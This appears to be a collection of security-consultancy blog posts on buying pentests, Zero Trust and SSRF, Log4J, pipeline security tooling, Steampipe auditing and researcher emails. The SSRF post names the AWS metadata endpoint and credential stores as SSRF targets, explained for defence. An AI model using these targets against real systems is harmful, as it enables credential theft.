How To Buy A Pentest and Get The Most Out Of It

This is a post about how to get the most out of a penetration test and what to consider while you are in the buying process evaluating vendors.

It is inspired by a recurring theme with our penetration tests where a client will say: "Wow, you are amazing! Our past vendor didn't find all that!" Even if my first gut reaction is pride in our team and our process, I always have mixed feelings when I hear that.

On the one hand, penetration testing is always time scoped and therefore resource limited. There are always going to be people that are better at finding one thing and less successful finding other things. For good vendors it is a highly skilled human centered activity and it is natural that there may be things we find that the previous person didn't find - even if they were very very good! I'm sure sometimes firms follow us and find things that we missed.

On the other hand, most of the time I hear this comment it is because the client's last vendor was not very good and they just ran some scans and delivered the report from the scans. It's not that hard to tell this was the case, nor is it hard to avoid this type of vendor - and that is basically what this post is about.

Ultimately, because we provide excellent penetration testing, we want our clients to be informed about the buying process, the different issues that arise with vendors and what makes for a successful pen testing engagement.

Say It With Me

Lots of folks before me have said this, so let's just repeat it here:

A scan is not a penetration test.

Lots of reputable people in the security industry.

If you walk away with nothing else from this post and you're going to go procure a pentest, just make sure you get an actual pentest and not a scan. We can do a scan too - but we call it a scan and we charge a fraction of the money to do it because it costs us very little to do it. It is so frustrating to follow a company (many are well known and trusted) that just ran a scan but charged even more than we did! Not to mention the injustice of leaving all of these low hanging fruit vulnerabilities in the client's application based on a misunderstanding of the task at hand.

Scoping To Get The Most Out Of A Pentest

When we scope penetration tests, because we are spending a lot of human time looking at the system, request payloads and other parts of the system, we care about a bunch of things. Understanding scoping can help you make sure you get the coverage you want.

How many roles are there in the application? The more roles there are, the more different types of authorization gaps there could be. Consider that as part of a penetration test, we're going to replay requests to ensure that User A can't see User B's data. We're also going to test that User A can't perform Manager C's function. The more different roles there are (User / Manager here), the more scenarios there are to test.

Another consideration is the number of screens or in an SPA the number of interaction points. The reason this matters is that each interaction point takes a chunk of time. If you are technical, you could think about each of these as an endpoint on an API or a POST. But the idea is that each interaction needs to be evaluated in a bunch of ways to identify issues. So the more interactions there are, the more time it will take.

Similarly, the complexity of the business function can add to the time it takes to perform a test. As can the number and types of fraud paths. In a recent scoping call, we saw that the application was 98% read only. That dramatically reduces the attack surface of the test.

To summarize the scoping consideration, we might ask:

Most of the tests we do are just one, two or three weeks and focus in on web applications and API's. We offer clients a choice of size because if they perceive high risk or want to go deeper, they should have that option. If they have limited budget and want to get the best test they can in a small scope, we try to accommodate that as well. If a client wants us to spend too small an amount of time on a large app, we reserve the right to decline because we just can't provide meaningful coverage.

Diminishing returns (see caption for citation)
https://en.wikipedia.org/wiki/Diminishing_returns#/media/File:Diminishing_Returns_Graph.svg

Our goal is to scope so that clients get good coverage and check the things that need to be checked, without passing the point of diminishing returns where we're spending more time but not finding more things. There's no way to be sure you've covered everything and there's no certain way to know when you get to this point. Our method is based on a decade of real world experience.

We generally recommend allocating a healthy amount of time and budget for penetration testing in the spirit of conducting serious testing with a real goal of identifying real issues so they can be fixed.

A clean test can be a bad result because it doesn't signal thorough evaluation. In our experience, partners, vendors and auditors are generally ok with tests that have serious findings provided that an organization took appropriate action based on the findings and confirmed that they had been fixed.

Standard Pentest Deliverables

When we do penetration testing, our goal is to provide everything you need to get everything possible out of the test. Most people know they need a report. The report is a large PDF (we just delivered one that was 107 pages) summarizing the findings and covering details about how to reproduce each finding and ideally how to fix them. We usually conduct a Read Out call with the client team to explain everything in the report and answer questions. The Read Out goes best when clients have had time to digest the report and ask questions about the detail. Often the preparation isn't complete and we just walk through the report to highlight important items.

When it comes to the report, even if you think you don't care, you probably need the report. Every once in a while we will do testing where the client doesn't think they need a formal report for audit purposes, they just care about the findings and want us to report the issues directly to Jira. That is fine with us, but usually someone needs to capture the output of the test at a point in time so that when you look back in 2-5 years you can see what you did and what was found back then. The best way to do that is to get the standard report.

That being said, the report is really just the beginning. For one, we don't recommend sharing the pen test report with anyone outside your company unless you have no other choice. Our reports basically always contain sensitive information about your security posture that you can reasonably say cannot be distributed. So what we recommend sharing is a one page executive summary that is truthful and describes the testing that was done, including the numbers of findings and key types of findings. We call this an Attestation Letter. This is intended to be shared with a third party as needed. It doesn't disclose any truly sensitive information other than the broad outcome of the testing. Usually that by itself isn't sensitive. It is implied that we would have a conversation with a partner if requested around the Attestation Letter but in 10 years nobody has ever asked us to do that.

We also include all of the raw evidence that is packagable in a supporting evidence folder. This includes the output of tools like Burp Suite, Amass, bucketfinder, nmap, dnstwist, sqlmap, etc. as we use them. We want developers that are interested to see the tools we used to collect the information. If you can do all of that part yourself, that is great. That being said, people rarely ask us anything about the raw evidence. Turns out understanding what those tools do requires some pretty expert level security knowledge...

One thing that is very informative is to look at the difference between the raw scan results in the evidence folder and the findings in the report. Since we find most of our most serious issues during manual testing, they don't show up in the tool reports. If your report matches the scan, you probably didn't get much manual analysis. Of course, vendors know this too so they don't provide the raw evidence - and on some level, you can't know that they provided all of it anyway.

After we do the readout call, most clients want to fix High and Medium severity findings and get an updated Report and Attestation Letter that reflects their progress. To do this, we need to Retest key items to confirm that the client has in fact fixed them. We don't remove things from the report but we do update the report to reflect that the item has been retested and confirmed to be fixed. We do this and included it in all of our pricing as part of something you always get - because we know most people will want it and we don't want to surprise you later with additional charges just because you didn't know to ask up front. We don't charge more for retesting or re-issuing a letter. We limit the time to retest to 90 days (with exceptions) to try to ensure that we have retestable scenarios. As code bases change, directly retesting an item can become impossible.

Summary of Deliverables:

Evaluating Pentest Vendors To Get The Best Result

There are a number of questions you can ask when you are looking at penetration testing vendors.

  1. What are the deliverables?
  2. How much will it cost?
  3. How long will it take? Do you have availability in the timeframe we need?
  4. Is retesting included?
  5. Will my team be dedicated to me during that period?
  6. What communication can I expect during the test?
  7. What type of background does the testing team have?
  8. What tools with the testing team use?
  9. How do you produce repeatable results?
  10. Can you provide an example report?
  11. Can you provide three references?
  12. Can you talk about how the assigned team's expertise maps to our application and tech stack?

One thing that is important as you compare options is that you have a clear statement of Scope so that the different vendors you talk to are quoting on the same thing.

Thinking About Incentives With Testing

There are a few topics that are relevant and that I've gotten familiar with in the process of doing penetration testing for the last 10+ years as Jemurai and 4+ years before that I would like to call out a bit even though they are rarely talked about out loud.

Obviously it is in the pentest vendor's interest to have the least experienced, least highly paid person possible do the work. It is also in their interest to have a tool do most of the work for them. Pure penetration testing is a utilization business. The owners of the company get rich when utilization is high and resources are cheap.

When testing is heavily tools based, you might have a pen tester doing more than one test at once. If a tester can do more than one test at once, they can bill more clients per week. Of course, if the test is driven by expert human testers looking at how to abuse a system they can only focus on one client at a time. As a consumer, you are entitled to know which you are getting but you are unlikely to get a straight answer - so you'll have to ask good questions.

Sometimes people ask about "bug bounty" or if they can do "continuous pentesting". Frankly, I think this industry is fraught with misinformation. I have seen vendors in this space grandstand about "activity" based metrics where they produced millions of interactions over a year and had 600 researchers involved in a program. The problem is with incentives the way they are, you have 600 people that are mildly interested for a half day that all check the same things. Nobody is paying more for higher levels of attention or expertise in this arena. This doesn't do anything great for your security! My experience is that a good solid penetration test gives you much much better results than these types of programs. I'm not saying you shouldn't do bug bounty or even continuous pentesting, just know what you are paying for, what you are getting, where it fits in your program and that it is fundamentally different from penetration testing.

Conclusion

The goal of this post was to demystify the penetration testing process so that you can navigate it as smoothly as possible and get the most thorough useful test possible for your budget. We've written about similar things about The Truth About Audits on securityprogram.io. At the very least, we hope this information will help make sure you are getting what you are paying for - and not just a scan.

AppSec - Zero Trust in Zero Trust

The other day we were giving developers security training around server side request forgery (SSRF). We see this all of the time now (see this great and detailed post by our team on SSRF in Real Life). It can be shockingly damaging. In any case, during the training the developers brought up a very interesting area where it was obvious that Zero Trust had provided a false sense of security so we wanted to write about that here. We'll start with some background, then get to the story and our conclusion.

Start With Zero Trust

As a quick aside, when I was at Trustwave (2008-2012) prior to founding Jemurai, someone came up with the catchy slogan that makes for the play on words (and company name) in this section:

Security begins with trust

Leader

Let's start by trying to talk about Zero Trust in a simplified way. Beyond being a marketing term that gets used in some places that it shouldn't (just search for Zero Trust and see which security companies AREN'T talking about it!), it generally seems to apply to a few things working together:

The result is that at a network level, I can control at a very fine grained level, the things that can connect to each other. I can allow Matt to connect to this server but not that one. I can allow this server to connect to that one. Part of the idea is that you no longer have these subnets where everything within can talk to everything else within, on the contrary every single connection is specifically managed and allowed or disallowed. It can all be managed via an API and at a network layer it is very difficult to compromise. Cool tools we've used that relate to Zero Trust include CloudFlare (cloudflared), Tailscale, Teleport, StrongDM, etc. (We are not intending to endorse a tool here, just giving some examples)

We should probably start by saying, these tools are cool and the idea behind all of this is solid.

The problem is, they are network tools, not AppSec tools. Let's talk about that more.

Why Doesn't Zero Trust Help With AppSec?

Well, it does when the network flow doesn't follow the path created with the Zero Trust tools. But a ton of application security vulnerabilities piggy back on existing connections to existing servers that are allowed and expected.

Let's look at a few common specific examples:

Now, Server Side Request Forgery (SSRF) is an interesting hybrid example because whether Zero Trust helps us or not depends on where we're forging the request to go to.

To put this another way, if we are forging a request to the AWS MetaData Service (eg. http://169.254.169.254/latest/meta-data/) and the Zero Trust setup of our environment doesn't allow the intermediate EC2 Instance to talk to this service, then Zero Trust has effectively prevented this SSRF attack.

However, if we use SSRF to attack something else that the application is already using, say a credential store or another micro-service, then the connection is generally allowed by Zero Trust and there is no reason that we are more secure from this attack based on our use of Zero Trust.

A Story About SSRF

Getting back to the narrative part of this post, the inspiration for the whole thing was a moment when developers at the client asked us during training: "wait, could you use SSRF to attack CredHub or the Service Registry"?

If you're not familiar with CredHub (as we weren't) you might have had to do some digging to find the answer. CredHub is basically a Spring ecosystem centralized credential storage service. It offers API's for storing, finding and retrieving credentials. Kind of like an App level HashiCorp Vault or AWS Secrets Manager. Literally at least some of the keys to the kingdom.

OK, that sounds like an interesting service to attack with SSRF.

Can I retrieve keys through the application via an SSRF vulnerability? We weren't sure so we looked into the documentation. Turns out CredHub offers two options for authenticating requests:

  1. A bearer token based approach (a la OAuth)
  2. A Zero Trust modeled MTLS option (mutually verified certificates for TLS)

From reading the docs, it seems like as long as the intermediate server we're jumping through with our SSRF attack regularly uses CredHub and can EVER ask CredHub questions, then our SSRF attack can also ask those same questions. The two servers will confirm they trust each other. But in this case, their trust will be misplaced.

Which is why I would amend our fearless slogan creator's words to:

Security begins and ends with trust

Konda

If you trust someone you shouldn't, you've lost your security! This is part of why I dislike the term Zero Trust. Because you really can't actually create Zero Trust, you can only create Network Zero Trust. Well and not even that, because what you're going to do is start building trust relationships anyway because a network with actual zero trust isn't a network!

The key takeaway from this story is that Zero Trust may not be an effective mitigation for SSRF.

Conclusion

We absolutely like the direction Zero Trust has been going and recommend solutions that simplify the Tunnel, ACL and AuthC approach we talked about above.

However, we need to be very aware of the places where SSRF happens. These seem to often include:

We also need to understand the boundaries of Zero Trust and application security. Rarely has Zero Trust played a significant role in mitigating the results of what we could do in a penetration test. We need to architect systems well and write secure code to do that.

Maybe the simplest way of all to explain this is that if you have code running in systems within the boundaries of a Zero Trust network, that code also has to be trusted to maintain its integrity in its interactions with the other resources in the network. Otherwise, your awesome Zero Trust network could be spilling data.

Branding and Company Update

We recently updated the Jemurai website, modeling it after the new securityprogram.io website which we really like (shout out to our web design friends at sweetandfizzy.com who did so much more than help with the design the site). As we did that, we realized we needed to try to be clearer about what we do, and where we talk about it. This post aims to capture all that and make it easy to understand.

What Are The Web Sites?

It has become increasingly clear that we want to have a main company website, which is this one at jemurai.com. It is intended to unify access to information about our team, open jobs, our products our services and all the things you'd want to know about our company. It is also where we post some technical blog posts that are driven by the software security practice.

In addition, we have several product related sites, including:

These are products of Jemurai, developed by Jemurai Labs - our R&D team. You will see posts relevant to the different product areas on the blogs for those sites - eg. The Truth About Audits on the securityprogram.io site.

So Wait, What Do You Do?

Lately, when we explain what we do, it can feel a little confusing - even for our team. So let me try to simplify our language here. We're basically developers that are interested in security. That has always been and continues to be our DNA.

So at the core of what we do are some services that help development teams build secure applications. These include:

While we do these projects, sometimes ideas pop up and become really compelling. With cloud security, it caused us to build JASP. With small companies being pushed to answer complex security questionnaires and prove they have good security, it inspired securityprogram.io. The point is, the security services around software development and cloud security are at our core and put us in a position to build the systems you see above.

Supporting Remote Work Securely

On Friday we wrote a blog post that talked about remote work and security from a workers perspective. We included a checklist. In this post, we want to develop that idea and talk about it more generally from a company and IT strategy perspective. We’ll start with some pictures to illustrate some of the issues.

The content of this post is also in this google slides presentation.

A Basic Network

Consider a basic network for a classic “small” company.

When the laptop or phone at the bottom come out (as when work is not on premise), everything falls apart. Identity won’t work. Access to files won’t work. Access to internal systems won’t work. In short, in a classic pre-cloud IT model without an explicit VPN strategy, many things don’t work.

A More Realistic Company Network

Most companies have more of a hybrid network.

In this network:

Tools That May Not Work

Some tools we put in place for security, simply will not work the same way without adaptation.

Strategy

Building a VPN now to restore connectivity to specific internal systems may solve certain problems. It will come with oversight and will not get you back to where you started in terms of the corp network and full connectivity.

Its a little late to start talking about business continuity strategy, but anywhere that it is possible to leverage cloud based services using a shared identify (SSO) system is going to be the most resilient to specific cloud or network issues.

Therefore, we advocate that companies bite the bullet and use cloud based resources wherever possible.

Near Term

Medium Term

Long Term

Conclusion

It is time to quickly embrace the cloud and SaaS based services.

Use a risk based approach to prioritize.

Resources

Security Culture - Introducing OWASP

In the latest video of our Security Culture series we give a 2 minute overview of OWASP.org, an amazing resource for developers.

OWASP Resources

OWASP resources include:

Log4J Security Issue

This post is a quick summary around the Log4J security issues happening in December 2021.
It includes a summary, a video, a PDF of slides we presented and extensive references.

The TL;DR is: update Log4J to 2.16.0 and keep watching for subsequent updates.

The 10,000 Foot View Summary of The Issue

Log4J is a widely used Java library.

It has a problem where if it is asked to process a malicious string, it will allow
an attacker to run their own code on a targeted server. This can happen in both
authenticated (where we know the user) and unauthenticated (anonymous) cases depending
on the application.

This issue is being actively probed and attacked.

The simplest fix is to patch. I expect further developments, so I recommend watching
for additional updates.

The Rough Detail

Log4J is a logging library that is used in a wide array of applications. I probably used it in
over half of the projects I’ve worked on in my career.

It is very normal for a developer to want to log something that a user enters. For example:

String user = getCurrentUser();
String document = request.getParameter("Document");
Logger logger = LogManager.getLogger(Thing.class.getName());
logger.debug("User {} requested document: {}", user, document);

That log statement where the user and document get put into a log statement is where the problem
occurs. One clear problem is that these statements are basically everywhere in code and it
would be nearly impossible to audit all of them.

The fix is basically to use a version of Log4J that doesn’t do the magic on the malicious
string by default. Alternatives are to tell an older version you don’t want that feature. Or
in extreme cases to rip the offending class right out of the log4j library.

There are a variety of ways to scan for the issue, and to identify log4j libary versions
locally. Even a simple approach of looking at dependencies could help.

Timeline

The vulnerability was disclosed to the Apache Log4J security team 11/24.

It was released to the public 12/10.

Patches 2.15.0 and 2.16.0 have been release since then.

I would look in log files from November forward for malicious activity as soon as possible.

A Video

I put together this 17 minute video overview that covers:

The Slides

If you want to read and navigate yourself, the slides are here.

References

We looked at a lot of sources as we navigated this issue. Here are some that we thought were helpful:

Pipeline Security Automation

This post talks about how we approach security automation in BitBucket Pipelines. It also introduces some new open source tools we built and use in the process.

Security In Pipelines

We’ve written before about using GitHub Actions and provided an Action friendly “workflow” with our Crush tool.

At a high level, Pipelines and Actions just do some computing work for you in Atlassian or Github’s data center. Often that work is related to source code, testing, or deployment.

Both leverage containers heavily for sandboxing the work that happens in the build and provide some level of abstraction that you can use to build your own pipes or workflows.

On some level, we’re using them to do the same work we used to use Jenkins or CircleCI or Travis to do.

We like automating security in Pipelines or Actions because it makes it easy to build security into your natural development workflows.

Real World

So what are we really talking about? What do we want to have happen?

We want to be able to apply any automated tools flexibly in a controlled environment that already has our code artifacts and knows about the key events.

Triggers for actions and pipelines can be:

The tools we want to run may range from:

Of course, we can run security unit tests and trigger other integrations (eg. SonarCloud) as well.

Just remember:

Tools are necessary but must be used by skilled operators.

I can’t tell you how often I see security tools installed but not used effectively.

OK Show Us Code

Here is an example of how we have a pipeline configured:

pipelines:
  branches:
    '{securityautomation/*}':
    - parallel:
      - step:
          name: Run Crush
          image: golang:1.16
          script:
            - go get -u github.com/jemurai/crush@v1.0.5
            - crush examine --threshold 7 . > crush.json
          artifacts:
            - crush.json
      - step:
          name: Dep Check
          image: openjdk:8
          script:
            - wget https://github.com/jeremylong/DependencyCheck/releases/download/v6.1.5/dependency-check-6.1.5-release.zip
            - unzip dependency-check-6.1.5-release.zip
            - rm dependency-check-6.1.5-release.zip
            - ./dependency-check/bin/dependency-check.sh --failOnCVSS 6 --exclude **/dependency-check/**/*.jar -f JSON --prettyPrint --scan .
          artifacts:
            - dependency-check-report.json
    - step:
        name: Report
        image: golang:1.16
        script:
          - go get -u github.com/jemurai/depcheck2off@v1.0.0
          - go get -u github.com/jemurai/off2jira@v1.0.0
          - depcheck2off ./dependency-check-report.json > ./depcheck.off.json
          - off2jira ./depcheck.off.json
          - off2jira ./crush.json

Let’s walk through it and talk about what is happening.

First, the branches part tells BitBucket when to run the pipeline. In this case, it will be on any push to a branch under securityautomation.

branches:
    '{securityautomation/*}':

We like doing this because it helps to isolate your security related changes and ensures that what you are finding doesn’t break other builds. In the long run, we want to have security tooling run more often.

Then we need to understand that there are three steps defined in the pipeline:

Crush and Depenendency Check are both code analysis so they can run in parallel. Hence the parallel: before their step: definitions.

To run Crush, we pull a base golang image image: golang:1.16, install Crush and run it. We drop the output into an artifact that means it will be available later.

- step:
    name: Run Crush
    image: golang:1.16
    script:
        - go get -u github.com/jemurai/crush@v1.0.5
        - crush examine --threshold 7 . > crush.json
    artifacts:
        - crush.json

Running Dependency Check is similar. You can see that we’re pulling a release from GitHub and unzipping it. This is on an openjdk image. Then we invoke dependency check and put the report in an artifact.

- step:
    name: Dep Check
    image: openjdk:8
    script:
        - wget https://github.com/jeremylong/DependencyCheck/releases/download/v6.1.5/dependency-check-6.1.5-release.zip
        - unzip dependency-check-6.1.5-release.zip
        - rm dependency-check-6.1.5-release.zip
        - ./dependency-check/bin/dependency-check.sh --failOnCVSS 6 --exclude **/dependency-check/**/*.jar -f JSON --prettyPrint --scan .
    artifacts:
        - dependency-check-report.json

The next part “Report” is interesting and we’re going to put it in a whole new section.

Reporting and Rethinking Security Tooling

Once we have Crush and Dependency Check output, we want to do something with it. We could leave it in BitBucket as an artifact and refer to the plain text file. That is better than not running the tools, but we also want make these visible and integrate into our normal processes.

Here’s how that looks in the pipeline we defined where we’re pushing the issues identified by Crush and OWASP Dependency Check to JIRA:

- step:
    name: Report
    image: golang:1.16
    script:
       - go get -u github.com/jemurai/depcheck2off@v1.0.0
       - go get -u github.com/jemurai/off2jira@v1.0.0
       - depcheck2off ./dependency-check-report.json > ./depcheck.off.json
       - off2jira ./depcheck.off.json
       - off2jira ./crush.json

Here we are installing and using two new golang based tools:

The basic philosophy is to build small tools that do one thing and do it in a simple and predictable way. This goes directly against our own past approach with OWASP Glue which we retired.

With Glue, you could rundifferent tools and push the output to a variety of trackers. The problem was that you ended up with a JVM, Python, Ruby, Node and an ever growing docker image. That made it hard to incorporate into pipelines efficiently. We also had to maintain everything and keep everything working to get an update pushed. It was a monolith.

With the Jemurai autom8d set of tools, we’re taking more of a classic Unix philosophy and building small purpose built utilities that can be put together in a number of ways.

So far we have:

We already have plans to build:

We also want to adapt and integrate some other code we have that does an inventory and metrics across repositories.

We’d love to hear from you about others that would be useful! We can help with this type of automation while doing so with open tooling you can leverage for the long term.

Leverage Pipelines

The great thing about pipelines (and actions) is that once you understand them, you can effectively push security tooling to a large number of projects quite easily.

Note that there are compute charges associated with running pipelines (or actions).

We have also had good success helping companies who leverage BitBucket or GitHub cloud because we can actually help commit the code that starts the automation project off. Combined with some training and a retained ongoing support setup - we can enable clients to very quickly improve their internal app security posture.

References

Cloud Security Auditing With Steampipe

This post talks about how we use different tools to accomplish different tasks in a cloud security context, zooming in on Steampipe as a tool that should make it very easy to prepare for and meet audit requirements.

Cloud Security Auditing

There are a couple of different things that we think of when we think of cloud security auditing.

One is a pure security activity of checking all of the configuration details on all of the services we are using to make sure they are configured properly.

Another is to support an external audit that somehow proves that we are doing the right thing across our infrastructure.

With SOC 2 and other audits, we are increasingly seeing tools introduced that supposedly help to magically speed up the audit process. As may be obvious already, I’m skeptical.
The idea that AI is going to magically help us with cloud security is laughably naive.

The cool thing about Steampipe, and really what the cloud API’s themselves enable, is that we can do a lot of that inventory and preparation oursives.

Spoiler: the tool can’t help you be secure, you have to do the work.

Finding Problems

Some tools are good at finding issues. I would categorize Prowler and ScoutSuite in this group. You run them to identify issues and they help you find problems. They are both open source and very useful. We built a commercial tool like this called JASP - so we know a thing or two about how these tools work and what they are good for and not good for.

JASP makes it basically as simple as possible to get everything running, keep it running consistently and provide reporting over time and alerting around issues.

Steampipe also supports checks against several CIS Benchmarks, including AWS, Azure and GCP.

Getting these running is easy for a DevOps person who is already using a CLI with any of these tools. So you can use Steampipe to do your “problem finding.”

There are commercial tools (including from the cloud providers) for finding problems too. Generally,
I feel they are not used very effectively and if you’re looking to find problems in your environment you might as well start with open source options. You need to understand them and the output to fix anything anyway.

On the downside, all of these tools produces huge lists of problems and lack context of the environment, including how the pieces fit together and what really is a security issue.

You can use these tools to prepare for an audit like a SOC 2, but it is likely they will have you doing a whole lot of extra work to clean up your report that the auditor won’t ask about and they might miss simple things the auditor really does care about - like are users in the correct IAM privileged roles.

Finding What Is

Building an inventory of your systems is outside the scope of the tools that find problems. If a system has an issue it will show up in the report but if it doesn’t, it won’t.

So when it comes to doing an audit, if the auditor says they want a list of EC2 instances, that may not be easy to supply. Not to mention the fact that you want to know what you have before you start the audit.

You can use native tools like AWS Config to keep track of what you have. You can use the GUI to do this work too, taking screenshots of the configuation. But this is kind of painful.

Enter Steampipe. With Steampipe, you can basically write queries against your accounts to list resources - including properties you might want to check.

For example, the following will show users without MFA:

select user_id, name, password_last_used, mfa_enabled
from aws_iam_user

I can query databases, EC2 instances, all kinds of things through the steampipe interface which basically produces a SQL interface on top of the AWS APIs.

A more detailed example is being able to query EC2 instances that have unencrypted volumes attached.

select
i.instance_id,
vols -> 'Ebs' ->> 'VolumeId' as vol_id,
vol.encrypted
from
aws_ec2_instance as i
cross join jsonb_array_elements(block_device_mappings) as vols
join aws_ebs_volume as vol on vol.volume_id = vols -> 'Ebs' ->> 'VolumeId'
where
not vol.encrypted;

Cool, right!

Unified Process

Something that is awesome about Steampipe is that it supports a lot of services through plugins for everything from AWS, GCP, Azure, Slack, Zoom, Alibaba, CloudFlare, DigitalOcean, Jira, Kubernetes, Shodan, Zendesk and more. It also has mods that implement checks against the data it can collect.

So I can use a plugin and then build queries to talk to all of these services and have a unified process for doing inventory and auditing. Once I know how to use it, I can really get a process in place quickly.

Own Your Tools and Actively Look

One of my favorite things about Steampipe is that you can (and we do) wrap the queries in scripts (in our case python) that allow us to run a series of queries and essentially translate audit requests for evidence into scripts that we can tweak and automate on the fly.

Ultimately, I believe that if you’re going to have developers or ops folks anywhere on the spectrum of DevOps managing your infrastructure, these are the types of tools and approaches that empower them to secure your environment and crush your audit.

I don’t know anyone at Turbot or who works on Steampipe, but I’m excited about recommending it for these types of proactive tech security projects.

References

Email from a Security Researcher

Yesterday, for the Nth time, a client had a “security researcher” send an email about a “high-impact” security vulnerability. I’ve crafted this response a few times so I figured I would blog about it.

Email from a Security Researcher

So here’s the email:

Hi <name>,

I'm <"researcher" name>, a penetration tester, and I have found a high-impact security vulnerability in the <company name> web app.

How can I report the issue details? Also, I'm inquiring if you reward reporting valid vulnerabilities.

Thanks, <"researcher" name>

Digression About Vulnerability Disclosure Programs

In general, I’m a fan of having a vulnerability disclosure program. Fundamentally, a disclosure program has to outline rules of engagement for reporting a vulnerability and a timeline for expecting a response. It might or might not involve a reward. The program should include some sort of scope.

This is positive, because often folks that are interested with software tinker with it (hack it) and find things that are important. Before disclosure programs and bug bounties, there was a lot of hostility to “hackers” who reported these kinds of issues - and so sometimes those issues would get sold into the zero day market. A disclosure program presents a company’s positive attitude toward researchers reporting issues and gives a framework for it to happen in a trustworthy way.

I’m also a fan of bug bounty programs, which are similar but generally imply that there is a reward for a reported vulnerability, a more explicit scope and a sense of what types of vulns may or may not be reported. Bug Bounty programs are often intermediated by firms like BugCrowd or HackerOne.

I have met a bunch of folks that are very active in this particular security community, and I’ve run bounty programs at large companies. There are a lot of great people here.

As others have stated previously more eloquently than I will, there are times and places to start a bounty program.

The TLDR; of which seems to be: bug bounties are great when you’ve got basic hygiene figured out and you have a way to handle an ongoing volume of reports.

Otherwise, you might just get inundated with information you don’t know how to deal with and only very little of which is realistically important to your security.

The Gory Detail

The truth is, these types of emails are common and often a result of someone opportunistically scanning for issues and hoping to make a little money.

They frequently identify issues such as missing X-Frame-Options HTTP headers or similar. Often, they are actually low or even informational severity, contrary to what the researcher’s email says.

Now, if the person is a legit security researcher letting you know about a problem, you want to thank them and give them a way to share what they know and ideally give them something in return. A researcher might accept recognition or swag. In the long run, we want to make these legitimate and commensurate with the value of the identified issue. I have seen researchers submit amazingly useful findings.

The problem is that most of these submissions, especially when framed like the one above, are not significant security findings at all and they are being used to SPAM a large number of companies with the hope that some will pay.

I have also seen “researchers” turn into extortionists who publicly complain about the way a company handles a minor problem in order to get attention and a reward.

To respond effectively, we want to engage the earnest researcher while shutting down the discussion with the extortionist.

I recommend responding with something like this email template:

Hi there,

Thank you for reaching out. We do not currently have a vulnerability disclosure program, reward program or bug bounty in place.

That being said, we have folks on the team that have been involved in those types of programs and know how to run them and it is something we may do in the future.

If you would like to report the issue to this security@ email, we will track it in good faith and consider providing some kind of award or recognition if we can.

At the same time, having run these programs in the past, we also know that there are a lot of folks out there who run scanners and submit the results to try to claim rewards. Those types of findings aren’t the type of issues that our program can reward.

We certainly appreciate the security community and understand the value of a mutually positive model for interaction. We’re committed to engaging with integrity.

We look forward to hearing from you.

Thank you,
Security

Of course, you have to actually engage with integrity and track the issue. If you do start a program, you should reward the researchers that reported real findings. You also have to communicate with researchers and fix issues.

Epic Security Failure and Risk

All I could do was facepalm after somebody pointed me to an article about how Microsoft unleashed a death star on hackers …

"Microsoft unleashes 'Death Star' on SolarWinds hackers in extraordinary response to breach" GeekWire Article

Let’s talk about failure.

Start with Sympathy

Look, its a bad situation.

Lots of IT and Security folks are working really hard right now. That includes people at SolarWinds, Microsoft, your favorite security vendor and companies we depend on every day.

None of what I’m about to say is personal or trying to make anything harder for anyone. Its all hard.

The Reality

But look, it’s a really bad situation.

Let’s say that 450 of the Fortune 500 and dozens of Federal systems were breached. I can think of any number of serious things that any adversary would want that access for.

Notice that none of this is as small as stealing tens or hundreds of millions of dollars or some intellectual property.

At this scale, the potential damage is hard to overstate.

The Security Reality

No seriously, it’s even worse than all of this. From the scant publicly available information, we can infer that hackers were in major networks for 7 months without being really detected.

Did these networks have XDR? Yes. Yes, they did.

Did these networks have next gen firewalls? Yes. Yes, they did.

Did these networks have AI and intrusion detection? Yes. Yes, they did.

Did all of these organizations review their supply chain for security with vendor compliance processes? Yes, they did.

Did these organizations have, among them, the very best the security industry has to offer? Yes. Again, I’m going to say they did. After all, we’re seeing key Federal systems and ~450 of the Fortune 500 impacted.

This is nothing short of a The Emperor’s New Clothes moment for cybersecurity. What were all these tools for? Is it maybe possible that they were oversold?

The Supposed Death Star Response

OK, I mean it’s cool that Microsoft helped sinkhole the DNS (with GoDaddy and others). We’ve seen cases where an individual malware researcher found the C&C domain and disabled it. That doesn’t feel like a major blow.

What about the Windows Defender updates that could find and then automatically disable this malware? Well, sure, but isn’t that their job? That’s the basic idea of Defender—to release updates. It’s actually 7 months too late.

The bottom line is that this piece about Microsoft getting medieval on some hackers is bullshit.

Most of the US cybersecurity system has been owned and it is a time for humility and a reckoning. I’m asking myself if this article was paid PR to try to sugar coat the message that guess what folks - an entire industry just suffered an epic failure and basically can’t be trusted.

Risk

So … what should people do?

Well, I would stop buying SecurityThings™ and start quantifying and isolating risk. This will take people, knowledge, processes and time.

If you assume that everything you have has been compromised, and there is no one thing you can do to secure it, what do you do next?

Start with the information you really need to safeguard or update.

Move on to systems you would need to be able to recreate or bring back online in a new way.

Some things aren’t worth defending. At least not when it is as hard as it is in the real world. I think that line just moved a lot for a lot of companies. Recalibrate.

Hang in there and keep at it. Just think fresh and for yourself. The impact we can make as security practitioners is both evident and in question.

References